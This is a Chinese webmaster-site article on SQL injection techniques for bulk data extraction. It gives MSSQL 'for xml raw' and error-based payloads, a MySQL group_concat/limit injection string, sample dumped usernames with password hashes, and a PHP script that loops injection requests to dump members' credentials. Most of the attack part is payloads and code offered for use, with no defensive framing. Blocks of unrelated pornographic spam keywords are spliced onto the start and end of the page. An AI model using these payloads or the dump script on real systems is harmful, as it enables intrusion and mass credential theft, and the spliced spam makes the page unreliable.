亚洲国产精品人久久,亚洲va国产日韩欧美精品色婷婷,久久久久88色偷偷,免费人成黄页在线观看国际

17站長網

17站長網 首頁 安全 入侵防御 查看內容

SQL注入中獲取數據的一些技巧分析

2022-9-26 12:54| 查看: 2650 |來源: 互聯網

一、MSSQL獲取數據: 用的比較多的就是for xml raw了,MSSQL2000都支持的! 注入中顯示數據的兩個辦法均可以使用,一是union select、二是顯錯,以MSSQL2005為例: 代碼如下:select username from members where 1=2
一、MSSQL獲取數據:

用的比較多的就是for xml raw了,MSSQL2000都支持的!

注入中顯示數據的兩個辦法均可以使用,一是union select、二是顯錯,以MSSQL2005為例:

代碼如下:select username from members where 1=2 union select top 3 username from members for xml raw
返回(如果username重復,自動去除重復值):

代碼如下:

select username from members where 1=(select top 3 username from members for xml raw)

返回:

代碼如下:
Msg 245, Level 16, State 1, Line 1
Conversion failed when converting the nvarchar value '' to data type int.

當數據量很大,無webshell,有注入點可以利用的時候,for xml raw 是不錯的獲取批量數據的辦法!為了不讓返回的數據量過大,top可以限制小一點,比如100,另外要附加腳本或者程序對返回值進行處理。

二、MYSQL獲取數據:

用的比較多的是group_concat,mysql>=4.1支持該函數,可能很多人知道了,但我看過的文章幾乎都是用來讀table_name或者column_name的,畢竟表名、列名的數據量不大,所以用起來很方便,可以一下子把所有表名或者所有列名讀出來。不過用group_concat批量注入讀數據的很少,雖然可以提高效率,增快速度。

因為group_concat有個瓶頸,當group_concat與limit連用時,limit不起作用(也許是先執行group_concat),于是group_concat一次性讀出很多條數據(取決于group_concat_max_len,默認1024),而一般網站數據量都是很大的。一旦不能與limit連用,怎么獲取之后的數據呢?

其實簡單變動下SQL語句即可以實現group_concat與limit連用:

代碼如下:
select concat(group_concat(A.username separator 0x7c7c7c),0x3a,group_concat(A.password separator 0x7c7c7c)) from (select * from members limit 0,3) A

返回:

guest|||admin|||oldjun:084e0343a0486ff05530df6c705c8bb4|||21232f297a57a5a743894a0e4a801fc3|||ad392a36c512176545900fd05772cbc6
于是簡單做下字符串處理,前三條數據就出來了。為了返回不至于數據量過大,單次查詢100以下一般可以接受的。

三、給出部分示例代碼(mysql group_concat 50條數據每次):

代碼如下:
if ($argc < 3) {
print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' start end(end: count/50)
Example:
php '.$argv[0].' 0 9999
Author:oldjun(http://www.oldjun.com)
+---------------------------------------------------------------------------+
');
exit;
}
error_reporting(7);
ini_set('max_execution_time', 0);
$start = $argv[1];
$over = $argv[2];
for($i=$start;$i<=$over;$i++){
getdata($i);
}
function getdata($i)
{
$resp = send($i);
if ($resp){
preg_match('#<<<<<<<<<<([^\n]+):([^\n]+)>>>>>>>>>>#', $resp, $value);
if($value){
$namearr=explode("|||",$value[1]);
$passarr=explode("|||",$value[2]);
for($j=0;$j<50;$j++){
echo $namearr[$j]."|||".$passarr[$j]."\r\n";
}
unset($namearr);
unset($passarr);
}else{
echo $resp;
echo "value error,return $i\r\n";
getdata($i);
}
}
else{
echo "resp error,return $i\r\n";
getdata($i);
}
}
function send($i)
{
$limit=$i*50;
//發送數據包代碼省略
//注入語句示例:union select 1,2,3,4,CONCAT(0x3C3C3C3C3C3C3C3C3C3C,group_concat(A.username separator 0x7c7c7c),0x3a,group_concat(A.password separator 0x7c7c7c),0x3E3E3E3E3E3E3E3E3E3E) FROM (select * from members limit ".$limit.",50) A#
}
?>
本文最后更新于 2022-9-26 12:54,某些文章具有時效性,若有錯誤或已失效,請在網站留言或聯系站長:17tui@17tui.com
·END·
站長網微信號:w17tui,關注站長、創業、關注互聯網人 - 互聯網創業者營銷服務中心

免責聲明:本站部分文章和圖片均來自用戶投稿和網絡收集,旨在傳播知識,文章和圖片版權歸原作者及原出處所有,僅供學習與參考,請勿用于商業用途,如果損害了您的權利,請聯系我們及時修正或刪除。謝謝!

17站長網微信二維碼

始終以前瞻性的眼光聚焦站長、創業、互聯網等領域,為您提供最新最全的互聯網資訊,幫助站長轉型升級,為互聯網創業者提供更加優質的創業信息和品牌營銷服務,與站長一起進步!讓互聯網創業者不再孤獨!

掃一掃,關注站長網微信

大家都在看

    熱門排行

      最近更新

        返回頂部
        亚洲国产精品人久久,亚洲va国产日韩欧美精品色婷婷,久久久久88色偷偷,免费人成黄页在线观看国际
        亚洲午夜激情网站| 国产一二精品视频| 国产精品二三区| 欧美变态tickle挠乳网站| 欧美—级在线免费片| 成人av午夜电影| 亚洲黄色免费网站| 国产女人18毛片水真多成人如厕 | 欧美一区二区视频在线观看2020| 亚洲bt欧美bt精品| 偷拍一区二区三区| 99re亚洲国产精品| 精品日韩在线一区| 中日韩av电影| 成人av在线播放网站| 亚洲国产精品久久人人爱蜜臀| 激情久久五月天| 国产成人在线网站| 成人91在线观看| 欧美剧在线免费观看网站| 国产亚洲精品7777| 日日夜夜精品免费视频| 亚洲精品日韩综合观看成人91| 久久亚洲私人国产精品va媚药| 亚洲午夜免费视频| 99精品1区2区| 91精品国产综合久久久久久久| 午夜视频久久久久久| 视频在线观看91| 日韩欧美色综合网站| 91视视频在线观看入口直接观看www | 欧美亚洲自拍偷拍| 不卡区在线中文字幕| 懂色av中文一区二区三区| 欧美精品一区二区三区蜜桃| 亚洲伦在线观看| 色综合久久综合网欧美综合网| 亚洲精品在线观看网站| 欧美亚洲动漫精品| 精品剧情在线观看| 亚洲激情男女视频| 欧美少妇xxx| 欧美一级艳片视频免费观看| 国产精品久久看| 欧美性猛交xxxx乱大交退制版| 日韩国产欧美在线观看| 在线亚洲精品福利网址导航| 久久精品99国产精品日本| 亚洲色图自拍偷拍美腿丝袜制服诱惑麻豆| 精品成人a区在线观看| 欧美一区二区三区免费视频| 国产亚洲一区字幕| 天堂va蜜桃一区二区三区| 欧美精品三级日韩久久| 亚洲精品成人少妇| 欧美激情中文不卡| 337p日本欧洲亚洲大胆精品 | 视频一区免费在线观看| 久久九九99视频| 国产精品毛片a∨一区二区三区| 久久69国产一区二区蜜臀| 久久这里只有精品视频网| 亚洲免费在线看| 日本视频在线一区| 国产精品三级电影| 欧美群妇大交群的观看方式| 日韩欧美亚洲国产另类| 在线观看免费亚洲| 欧美一区二区久久| 午夜不卡在线视频| 亚洲乱码国产乱码精品精小说 | 国产精品久99| 国产片一区二区| www日韩大片| 久久精品日产第一区二区三区高清版| 亚洲午夜激情网页| a4yy欧美一区二区三区| 青青草91视频| 播五月开心婷婷综合| 成+人+亚洲+综合天堂| 欧美电影影音先锋| 亚洲高清一区二区三区| 调教+趴+乳夹+国产+精品| 色哟哟国产精品免费观看| 国产在线精品一区二区不卡了 | 国产99久久久国产精品潘金网站| 亚洲少妇最新在线视频| 亚洲女与黑人做爰| 国产人久久人人人人爽| 国产色产综合色产在线视频| 成人免费毛片aaaaa**| 国产目拍亚洲精品99久久精品| 国产拍揄自揄精品视频麻豆| 美女在线观看视频一区二区| 欧美一级一级性生活免费录像| 日韩一区二区电影在线| 五月综合激情网| 在线一区二区三区做爰视频网站| 国产亚洲视频系列| 国产在线精品免费| av电影在线不卡| 国产三区在线成人av| 国产成人av影院| 国产日韩欧美高清| 1区2区3区国产精品| 91免费国产视频网站| 五月激情六月综合| 日韩一级视频免费观看在线| 成人性生交大片免费看视频在线| 日韩一区二区电影| 国产一区二区三区在线看麻豆| 综合久久一区二区三区| 日韩一区二区三区视频| 色播五月激情综合网| 欧美国产日韩在线观看| 欧美日本免费一区二区三区| 中文字幕精品在线不卡| 久久www免费人成看片高清| 日韩一区二区高清| 亚洲亚洲人成综合网络| 久久精品夜色噜噜亚洲a∨| 亚洲欧美一区二区三区极速播放 | 日韩福利电影在线观看| 久久综合精品国产一区二区三区| 91丨九色丨蝌蚪丨老版| 中文在线资源观看网站视频免费不卡 | 亚洲国产成人av| 亚洲欧洲日韩av| 日韩avvvv在线播放| 久久亚洲精品国产精品紫薇| 欧美嫩在线观看| 91免费看视频| 日韩欧美一区二区不卡| 亚洲黄色免费网站| 91成人国产精品| 欧美日韩不卡一区| 久久婷婷久久一区二区三区| 26uuu欧美| 国产自产v一区二区三区c| 国产日韩欧美电影| 欧美顶级少妇做爰| 成人午夜电影网站| 亚洲日本护士毛茸茸| 欧美色图12p| 日韩视频一区二区三区在线播放 | 久久国产精品无码网站| 亚洲欧洲国产日本综合| 欧美性一二三区| 亚洲桃色在线一区| 亚洲国产日韩综合久久精品| 日本中文一区二区三区| 国产丝袜在线精品| 国产视频911| 日韩久久一区二区| 国产成人av电影在线| 日韩精品一区二区三区视频播放 | 91视频观看视频| 成人性生交大片免费看视频在线 | 亚洲精品免费看| www.欧美精品一二区| 午夜视频一区二区三区| 欧美日韩一二三区| 五月婷婷综合网| 91麻豆精品在线观看| 精品国一区二区三区| 亚洲欧美激情在线| 精品制服美女丁香| 国产精品久久二区二区| 午夜伦欧美伦电影理论片| 粉嫩av一区二区三区粉嫩| 亚洲欧美怡红院| 视频一区二区中文字幕| 国产一区二区视频在线| 首页国产丝袜综合| 一本色道**综合亚洲精品蜜桃冫 | 日韩一区二区电影| 在线成人av网站| 美腿丝袜在线亚洲一区| 欧美一级二级在线观看| 亚洲三级在线观看| 亚洲色图欧洲色图婷婷| 亚洲国产一区二区在线播放| 欧美日韩久久久| 不卡av电影在线播放| 国产精品美女www爽爽爽| 一本色道综合亚洲| 国产91精品欧美| 日韩欧美在线网站| 国产精品小仙女| 人人狠狠综合久久亚洲| 欧美亚洲免费在线一区| 亚洲成a人v欧美综合天堂下载| 亚洲精品视频自拍| 亚洲美女区一区| 国产精品亚洲成人| 91麻豆精品国产91| 蜜臀va亚洲va欧美va天堂| 婷婷夜色潮精品综合在线| 久久成人免费日本黄色| 亚洲高清不卡在线观看|